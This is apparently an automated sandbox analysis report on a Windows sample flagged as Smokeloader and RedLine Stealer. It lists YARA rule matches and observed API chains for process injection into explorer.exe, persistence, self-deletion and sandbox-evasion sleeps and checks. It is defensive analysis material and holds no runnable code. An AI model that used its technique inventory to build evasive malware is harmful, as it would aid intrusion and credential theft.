                Source: 00000000.00000002.347095759.00000000020A1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
                Source: 0000000C.00000000.411589845.00000000009E0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
                Source: 0000000F.00000000.420288650.00000000031E0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
                Source: 00000000.00000002.346601770.00000000005D0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
                Source: 00000009.00000002.406829127.0000000000700000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
                Source: 00000000.00000002.346812958.000000000060A000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
                Source: 00000010.00000000.423035885.00000000007E0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
                Source: 00000000.00000002.346666685.00000000005E0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
                Source: 00000014.00000000.428749130.0000000000580000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
                Source: 00000009.00000002.406779661.00000000006D0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
                Source: 00000009.00000002.407192385.00000000020D1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
                Source: 0000000E.00000000.417608043.00000000003D0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
                Source: 0000000A.00000000.405631874.0000000000CF0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
                Source: 00000001.00000000.338708718.0000000002661000.00000020.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
                Source: C:\Windows\SysWOW64\explorer.exe Code function: 20_2_00572171 StrStrIW,StrStrIW,RtlZeroMemory,ShellExecuteExW,StrStrIW,RtlAdjustPrivilege,ExitWindowsEx
                Source: C:\Windows\explorer.exe Code function: 11_2_00D173EF
                Source: C:\Windows\explorer.exe Code function: 11_2_00D12450
                Source: C:\Windows\explorer.exe Code function: 11_2_00D12D60
                Source: C:\Windows\explorer.exe Code function: 13_2_00F42860
                Source: C:\Windows\explorer.exe Code function: 13_2_00F42054
                Source: C:\Windows\SysWOW64\explorer.exe Code function: 14_2_003A803C
                Source: C:\Windows\SysWOW64\explorer.exe Code function: 14_2_003A3D28
                Source: C:\Windows\SysWOW64\explorer.exe Code function: 14_2_003AE95C
                Source: C:\Windows\SysWOW64\explorer.exe Code function: 14_2_003AF9F4
                Source: C:\Windows\SysWOW64\explorer.exe Code function: 14_2_003AC392
                Source: C:\Windows\SysWOW64\explorer.exe Code function: 15_2_031D142C
                Source: C:\Windows\explorer.exe Code function: 17_2_00AD2A04
                Source: C:\Windows\explorer.exe Code function: 17_2_00AD20F4
                Source: C:\Windows\SysWOW64\explorer.exe Code function: 20_2_00572ADD
                Source: C:\Windows\SysWOW64\explorer.exe Code function: String function: 003A8E70 appears 32 times
                Source: C:\Users\user\Desktop\file.exe Code function: 0_2_004015D5 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection
                Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00401602 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection
                Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00401605 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection
                Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00401609 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection
                Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00401613 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection
                Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00401617 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection
                Source: C:\Users\user\Desktop\file.exe Code function: 0_2_004033CC GetModuleHandleA,GetModuleFileNameW,ExpandEnvironmentStringsW,CreateFileMappingW,GetKeyboardLayoutList,GetTokenInformation,ShellExecuteExW,NtOpenProcess,NtCreateSection,NtAllocateVirtualMemory,NtDuplicateObject,NtQueryInformationProcess,NtOpenKey,NtEnumerateKey,strstr,wcsstr,tolower,towlower
                Source: C:\Users\user\Desktop\file.exe Code function: 0_2_004015D4 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection
                Source: C:\Users\user\Desktop\file.exe Code function: 0_2_004015E0 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection
                Source: C:\Users\user\Desktop\file.exe Code function: 0_2_004015EA NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection
                Source: C:\Users\user\Desktop\file.exe Code function: 0_2_004015EE NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection
                Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00402693 NtOpenKey,NtEnumerateKey,NtEnumerateKey
                Source: C:\Windows\SysWOW64\explorer.exe Code function: 10_2_00CE3DB7 RtlMoveMemory,RtlMoveMemory,NtUnmapViewOfSection
                Source: C:\Windows\SysWOW64\explorer.exe Code function: 10_2_00CE20A3 NtCreateSection,NtMapViewOfSection
                Source: C:\Windows\SysWOW64\explorer.exe Code function: 10_2_00CE213A lstrcmpi,OpenProcess,NtSetInformationProcess,CloseHandle,NtUnmapViewOfSection,NtUnmapViewOfSection,RtlMoveMemory,RtlMoveMemory,RtlMoveMemory,NtUnmapViewOfSection,CloseHandle,CreateMutexA,GetLastError,CloseHandle,Sleep,GetModuleHandleA,GetProcAddress,ReadProcessMemory,WriteProcessMemory,CreateRemoteThread,CloseHandle,Sleep,WriteProcessMemory,CreateRemoteThread,CloseHandle,CloseHandle,CloseHandle,CloseHandle,CloseHandle
                Source: C:\Windows\explorer.exe Code function: 11_2_00D1527C RtlAllocateHeap,NtUnmapViewOfSection
                Source: C:\Windows\SysWOW64\explorer.exe Code function: 12_2_009D1016 RtlMoveMemory,RtlMoveMemory,NtUnmapViewOfSection,GetCurrentProcessId,lstrcmpi,CreateToolhelp32Snapshot,Process32First,lstrcmpi,lstrcmpi,lstrcmpi,lstrcmpi,lstrcmpi,lstrcmpi,lstrcmpi,lstrcmpi,lstrcmpi,lstrcmpi,lstrcmpi,lstrcmpi,lstrcmpi,lstrcmpi,lstrcmpi,lstrcmpi,lstrcmpi,lstrcmpi,lstrcmpi,lstrcmpi,lstrcmpi,Process32Next,FindCloseChangeNotification,Sleep
                Source: C:\Windows\SysWOW64\explorer.exe Code function: 12_2_009D1819 lstrcmpi,OpenProcess,NtSetInformationProcess,CloseHandle,NtUnmapViewOfSection,NtUnmapViewOfSection,RtlMoveMemory,RtlMoveMemory,RtlMoveMemory,NtUnmapViewOfSection,CloseHandle,CreateMutexA,GetLastError,CloseHandle,Sleep,GetModuleHandleA,GetProcAddress,ReadProcessMemory,WriteProcessMemory,CreateRemoteThread,CloseHandle,Sleep,WriteProcessMemory,CreateRemoteThread,CloseHandle,CloseHandle,CloseHandle,CloseHandle,CloseHandle
                Source: C:\Windows\SysWOW64\explorer.exe Code function: 12_2_009D1A80 NtCreateSection,NtMapViewOfSection
                Source: C:\Windows\explorer.exe Code function: 13_2_00F4355C RtlAllocateHeap,NtUnmapViewOfSection
                Source: C:\Windows\SysWOW64\explorer.exe Code function: 14_2_003A1EBE RtlMoveMemory,NtUnmapViewOfSection
                Source: C:\Windows\SysWOW64\explorer.exe Code function: 15_2_031D1016 WSAStartup,RtlMoveMemory,NtUnmapViewOfSection
                Source: C:\Windows\SysWOW64\explorer.exe Code function: 16_2_007D1016 RtlMoveMemory,RtlMoveMemory,NtUnmapViewOfSection,GetCurrentProcessId,wsprintfA,RtlMoveMemory,CreateToolhelp32Snapshot,Process32First,CharLowerA,lstrcmpi,lstrcmpi,Process32Next,CloseHandle,Sleep
                Source: C:\Windows\SysWOW64\explorer.exe Code function: 16_2_007D18BF OpenProcess,NtSetInformationProcess,CloseHandle,NtUnmapViewOfSection,NtUnmapViewOfSection,RtlMoveMemory,RtlMoveMemory,RtlMoveMemory,NtUnmapViewOfSection,CloseHandle,CreateMutexA,GetLastError,CloseHandle,Sleep,GetModuleHandleA,GetProcAddress,ReadProcessMemory,WriteProcessMemory,CreateRemoteThread,CloseHandle,Sleep,WriteProcessMemory,CreateRemoteThread,CloseHandle,CloseHandle,CloseHandle,CloseHandle,CloseHandle
                Source: C:\Windows\SysWOW64\explorer.exe Code function: 16_2_007D1B26 NtCreateSection,NtMapViewOfSection
                Source: C:\Windows\explorer.exe Code function: 17_2_00AD370C RtlAllocateHeap,NtUnmapViewOfSection
                Source: C:\Windows\SysWOW64\explorer.exe Code function: 20_2_005726A9 RtlMoveMemory,RtlMoveMemory,NtUnmapViewOfSection
                Source: C:\Windows\SysWOW64\explorer.exe Code function: 20_2_00571C58 NtCreateSection,NtMapViewOfSection
                Source: C:\Windows\SysWOW64\explorer.exe Code function: 20_2_00571CEF OpenProcess,CloseHandle,NtUnmapViewOfSection,NtUnmapViewOfSection,RtlMoveMemory,RtlMoveMemory,RtlMoveMemory,NtUnmapViewOfSection,CloseHandle,CreateMutexA,GetLastError,CloseHandle,Sleep,GetModuleHandleA,GetProcAddress,ReadProcessMemory,WriteProcessMemory,CreateRemoteThread,CloseHandle,Sleep,WriteProcessMemory,CloseHandle,CloseHandle,CloseHandle,CloseHandle
                Source: file.exe Static PE information: Resource name: RT_VERSION type: x86 executable not stripped
                Source: jdggfai.1.dr Static PE information: Resource name: RT_VERSION type: x86 executable not stripped
                Source: C:\Windows\explorer.exe Section loaded: taskschd.dll
                Source: C:\Windows\explorer.exe Section loaded: dhcpcsvc6.dll
                Source: C:\Windows\explorer.exe Section loaded: dhcpcsvc.dll
                Source: C:\Windows\explorer.exe Section loaded: ondemandconnroutehelper.dll
                Source: C:\Windows\explorer.exe Section loaded: webio.dll
                Source: C:\Windows\explorer.exe Section loaded: mswsock.dll
                Source: C:\Windows\explorer.exe Section loaded: winnsi.dll
                Source: file.exe Virustotal: Detection: 33%
                Source: file.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: C:\Users\user\Desktop\file.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                Source: unknown Process created: C:\Users\user\Desktop\file.exe C:\Users\user\Desktop\file.exe
                Source: unknown Process created: C:\Users\user\AppData\Roaming\jdggfai C:\Users\user\AppData\Roaming\jdggfai
                Source: C:\Windows\explorer.exe Process created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe
                Source: C:\Windows\explorer.exe Process created: C:\Windows\explorer.exe C:\Windows\explorer.exe
                Source: C:\Windows\explorer.exe Process created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe
                Source: C:\Windows\explorer.exe Process created: C:\Windows\explorer.exe C:\Windows\explorer.exe
                Source: C:\Windows\explorer.exe Process created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe
                Source: C:\Windows\explorer.exe Process created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe
                Source: C:\Windows\explorer.exe Process created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe
                Source: C:\Windows\explorer.exe Process created: C:\Windows\explorer.exe C:\Windows\explorer.exe
                Source: C:\Windows\explorer.exe Process created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe
                Source: C:\Windows\explorer.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32
                Source: C:\Windows\explorer.exe File created: C:\Users\user\AppData\Roaming\jdggfai
                Source: classification engine Classification label: mal100.bank.troj.evad.winEXE@20/3@29/1
                Source: C:\Windows\SysWOW64\explorer.exe Code function: 10_2_00CE3BEA wsprintfA,lstrcmpi,CreateToolhelp32Snapshot,Process32First,lstrcmpi,lstrcmpi,lstrcmpi,lstrcmpi,lstrcmpi,lstrcmpi,lstrcmpi,Process32Next,FindCloseChangeNotification,Sleep
                Source: C:\Windows\explorer.exe Process created: C:\Windows\SysWOW64\explorer.exe
                Source: C:\Windows\explorer.exe Process created: C:\Windows\explorer.exe
                Source: C:\Windows\explorer.exe Process created: C:\Windows\SysWOW64\explorer.exe
                Source: C:\Windows\explorer.exe Process created: C:\Windows\explorer.exe
                Source: C:\Windows\explorer.exe Process created: C:\Windows\SysWOW64\explorer.exe
                Source: C:\Windows\explorer.exe Process created: C:\Windows\SysWOW64\explorer.exe
                Source: C:\Windows\explorer.exe Process created: C:\Windows\SysWOW64\explorer.exe
                Source: C:\Windows\explorer.exe Process created: C:\Windows\explorer.exe
                Source: C:\Windows\explorer.exe Process created: C:\Windows\SysWOW64\explorer.exe
                Source: C:\Users\user\Desktop\file.exe File opened: C:\Windows\SysWOW64\msvcr100.dll
                Source: file.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                Source: Binary string: C:\cas-rih_casur\velinimuc luzotumez14.pdb source: file.exe, jdggfai.1.dr
                Source: Binary string: bC:\cas-rih_casur\velinimuc luzotumez14.pdb0f source: file.exe, jdggfai.1.dr

                Data Obfuscation

                Source: C:\Users\user\Desktop\file.exe Unpacked PE file: 0.2.file.exe.400000.0.unpack .text:ER;.data:W;.rsrc:R; vs .text:EW;
                Source: C:\Users\user\AppData\Roaming\jdggfai Unpacked PE file: 9.2.jdggfai.400000.0.unpack .text:ER;.data:W;.rsrc:R; vs .text:EW;
                Source: C:\Windows\SysWOW64\explorer.exe Code function: 10_2_00CE4F87 push esp; iretd 10_2_00CE4F88
                Source: C:\Windows\SysWOW64\explorer.exe Code function: 10_2_00CE9265 push BD6C6D74h; retf 10_2_00CE9275
                Source: C:\Windows\explorer.exe Code function: 11_2_00D114D4 push esi; ret 11_2_00D114D6
                Source: C:\Windows\explorer.exe Code function: 11_2_00D17197 push esp; iretd 11_2_00D17198
                Source: C:\Windows\explorer.exe Code function: 11_2_00D161A0 push eax; retf 11_2_00D161A1
                Source: C:\Windows\explorer.exe Code function: 11_2_00D11405 push esi; ret 11_2_00D11407
                Source: C:\Windows\explorer.exe Code function: 11_2_00D1C877 push edi; ret 11_2_00D1C878
                Source: C:\Windows\SysWOW64\explorer.exe Code function: 12_2_009D3417 push esp; iretd 12_2_009D3418
                Source: C:\Windows\explorer.exe Code function: 13_2_00F414D4 push esi; ret 13_2_00F414D6
                Source: C:\Windows\explorer.exe Code function: 13_2_00F445A7 push esp; iretd 13_2_00F445A8
                Source: C:\Windows\explorer.exe Code function: 13_2_00F41405 push esi; ret 13_2_00F41407
                Source: C:\Windows\SysWOW64\explorer.exe Code function: 14_2_003A8EB5 push ecx; ret 14_2_003A8EC8
                Source: C:\Windows\SysWOW64\explorer.exe Code function: 14_2_003C598F push ebp; retf 14_2_003C59A7
                Source: C:\Windows\SysWOW64\explorer.exe Code function: 15_2_031D3527 push esp; iretd 15_2_031D3528
                Source: C:\Windows\SysWOW64\explorer.exe Code function: 16_2_007D3627 push esp; iretd 16_2_007D3628
                Source: C:\Windows\explorer.exe Code function: 17_2_00AD1405 push esi; ret 17_2_00AD1407
                Source: C:\Windows\explorer.exe Code function: 17_2_00AD14D4 push esi; ret 17_2_00AD14D6
                Source: C:\Windows\explorer.exe Code function: 17_2_00ADAC8D push esp; iretd 17_2_00ADAC95
                Source: C:\Windows\explorer.exe Code function: 17_2_00ADAAD2 push ebp; iretd 17_2_00ADAAD3
                Source: C:\Windows\SysWOW64\explorer.exe Code function: 20_2_005743C7 push esp; iretd 20_2_005743C8
                Source: C:\Windows\SysWOW64\explorer.exe Code function: 20_2_00578DD2 push ebp; ret 20_2_00578E1E
                Source: C:\Windows\SysWOW64\explorer.exe Code function: 20_2_005793AB push FFFFFFFFh; retf 20_2_005793AD
                Source: C:\Windows\SysWOW64\explorer.exe Code function: 10_2_00CE1FA1 CloseHandle,RtlMoveMemory,LoadLibraryA,GetProcAddress,LdrProcessRelocationBlock
                Source: C:\Windows\explorer.exe File created: C:\Users\user\AppData\Roaming\jdggfai

                Hooking and other Techniques for Hiding and Protection

                Source: C:\Windows\explorer.exe File deleted: c:\users\user\desktop\file.exe
                Source: C:\Windows\explorer.exe File opened: C:\Users\user\AppData\Roaming\jdggfai:Zone.Identifier read attributes | delete
                Source: C:\Windows\SysWOW64\explorer.exe Code function: 10_2_00CE38EA GetModuleFileNameA,GetCurrentProcessId,wsprintfA,CreateMutexA,GetLastError,RtlInitializeCriticalSection,PathFindFileNameA,lstrcat,Sleep,lstrcmpi,lstrcmpi,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetProcAddress,lstrcmpi,lstrcmpi,lstrcmpi,StrStrIA,GetCommandLineA,GetCommandLineA,StrStrIA,GetModuleHandleA,lstrcmpi,GetCommandLineA,StrStrIA,lstrcmpi,GetCommandLineA,StrStrIA,GetModuleHandleA,GetModuleHandleA,GetModuleHandleA,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,RtlExitUserThread,wsprintfA,lstrcmpi,CreateToolhelp32Snapshot,Process32First,FindCloseChangeNotification,Sleep
                Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX

                Malware Analysis System Evasion

                Source: C:\Windows\SysWOW64\explorer.exeEvasive API call chain: CreateMutex,DecisionNodes,Sleepgraph_12-840
                Source: C:\Windows\SysWOW64\explorer.exeCode function: GetModuleFileNameA,GetCurrentProcessId,wsprintfA,CreateMutexA,GetLastError,RtlInitializeCriticalSection,PathFindFileNameA,lstrcat,Sleep,lstrcmpi,lstrcmpi,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetProcAddress,lstrcmpi,lstrcmpi,lstrcmpi,StrStrIA,GetCommandLineA,GetCommandLineA,StrStrIA,GetModuleHandleA,lstrcmpi,GetCommandLineA,StrStrIA,lstrcmpi,GetCommandLineA,StrStrIA,GetModuleHandleA,GetModuleHandleA,GetModuleHandleA,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,RtlExitUserThread,wsprintfA,lstrcmpi,CreateToolhelp32Snapshot,Process32First,FindCloseChangeNotification,Sleep,10_2_00CE38EA
Source: C:\Users\user\Desktop\file.exe | Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI (6 occurrences)
Source: C:\Users\user\AppData\Roaming\jdggfai | Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI (6 occurrences)
Source: C:\Windows\SysWOW64\explorer.exe | Decision node followed by non-executed suspicious API: DecisionNode, Non Executed (send or recv or WinExec) (graph_15-1046)
Source: C:\Windows\explorer.exe TID: 5336 | Thread sleep count: 650 > 30
Source: C:\Windows\explorer.exe TID: 4564 | Thread sleep count: 311 > 30
Source: C:\Windows\explorer.exe TID: 4564 | Thread sleep time: -31100s >= -30000s
Source: C:\Windows\explorer.exe TID: 4536 | Thread sleep count: 330 > 30
Source: C:\Windows\explorer.exe TID: 4536 | Thread sleep time: -33000s >= -30000s
Source: C:\Windows\explorer.exe TID: 4388 | Thread sleep count: 505 > 30
Source: C:\Windows\explorer.exe TID: 4540 | Thread sleep count: 225 > 30
Source: C:\Windows\explorer.exe TID: 1868 | Thread sleep count: 233 > 30
Source: C:\Windows\SysWOW64\explorer.exe TID: 1368 | Thread sleep count: 38 > 30
Source: C:\Windows\SysWOW64\explorer.exe TID: 1368 | Thread sleep time: -38000s >= -30000s
Source: C:\Windows\explorer.exe TID: 3896 | Thread sleep count: 32 > 30
Source: C:\Windows\explorer.exe TID: 3896 | Thread sleep time: -32000s >= -30000s
Source: C:\Windows\SysWOW64\explorer.exe TID: 1840 | Thread sleep count: 34 > 30
Source: C:\Windows\SysWOW64\explorer.exe TID: 1840 | Thread sleep time: -34000s >= -30000s
Source: C:\Windows\SysWOW64\explorer.exe TID: 3196 | Thread sleep count: 327 > 30
Source: C:\Windows\SysWOW64\explorer.exe TID: 3196 | Thread sleep time: -196200000s >= -30000s
Source: C:\Windows\SysWOW64\explorer.exe TID: 3196 | Thread sleep time: -600000s >= -30000s
Source: C:\Windows\SysWOW64\explorer.exe TID: 2308 | Thread sleep count: 36 > 30
Source: C:\Windows\SysWOW64\explorer.exe TID: 2308 | Thread sleep time: -36000s >= -30000s
Source: C:\Windows\SysWOW64\explorer.exe TID: 4164 | Thread sleep count: 36 > 30
Source: C:\Windows\SysWOW64\explorer.exe TID: 4164 | Thread sleep time: -36000s >= -30000s
Source: C:\Windows\explorer.exe TID: 4728 | Thread sleep count: 35 > 30
Source: C:\Windows\explorer.exe TID: 4728 | Thread sleep time: -35000s >= -30000s
Source: C:\Windows\SysWOW64\explorer.exe TID: 860 | Thread sleep count: 33 > 30
Source: C:\Windows\SysWOW64\explorer.exe TID: 860 | Thread sleep time: -33000s >= -30000s
Source: C:\Windows\explorer.exe | Last function: Thread delayed (8 occurrences)
Source: C:\Windows\SysWOW64\explorer.exe | Last function: Thread delayed (10 occurrences)
Source: C:\Windows\SysWOW64\explorer.exe | Code function: 10_2_00CE16C7 GetCurrentProcessId,GetCurrentThreadId,CreateToolhelp32Snapshot,Thread32First,OpenThread,SuspendThread,ResumeThread,CloseHandle,Thread32Next,CloseHandle,10_2_00CE16C7
Source: C:\Windows\SysWOW64\explorer.exe | Evasive API call chain: GetModuleFileName, DecisionNodes, ExitProcess (graph_14-8055)
Source: C:\Windows\SysWOW64\explorer.exe | Thread delayed: delay time: 600000 (2 occurrences)
Source: C:\Windows\explorer.exe | Window / User API: threadDelayed 650
Source: C:\Windows\explorer.exe | Window / User API: threadDelayed 505
Source: C:\Windows\SysWOW64\explorer.exe | API coverage: 7.7 %
Source: C:\Windows\SysWOW64\explorer.exe | API coverage: 9.4 %
Source: C:\Users\user\Desktop\file.exe | Process information queried: ProcessInformation
Source: C:\Windows\SysWOW64\explorer.exe | Code function: 10_2_00CE14D8 wsprintfW,FindFirstFileW,wsprintfW,SetFileAttributesW,DeleteFileW,FindNextFileW,FindClose,10_2_00CE14D8
Source: C:\Windows\SysWOW64\explorer.exe | Code function: 10_2_00CE13FE wsprintfW,FindFirstFileW,wsprintfW,RemoveDirectoryW,FindNextFileW,FindClose,10_2_00CE13FE
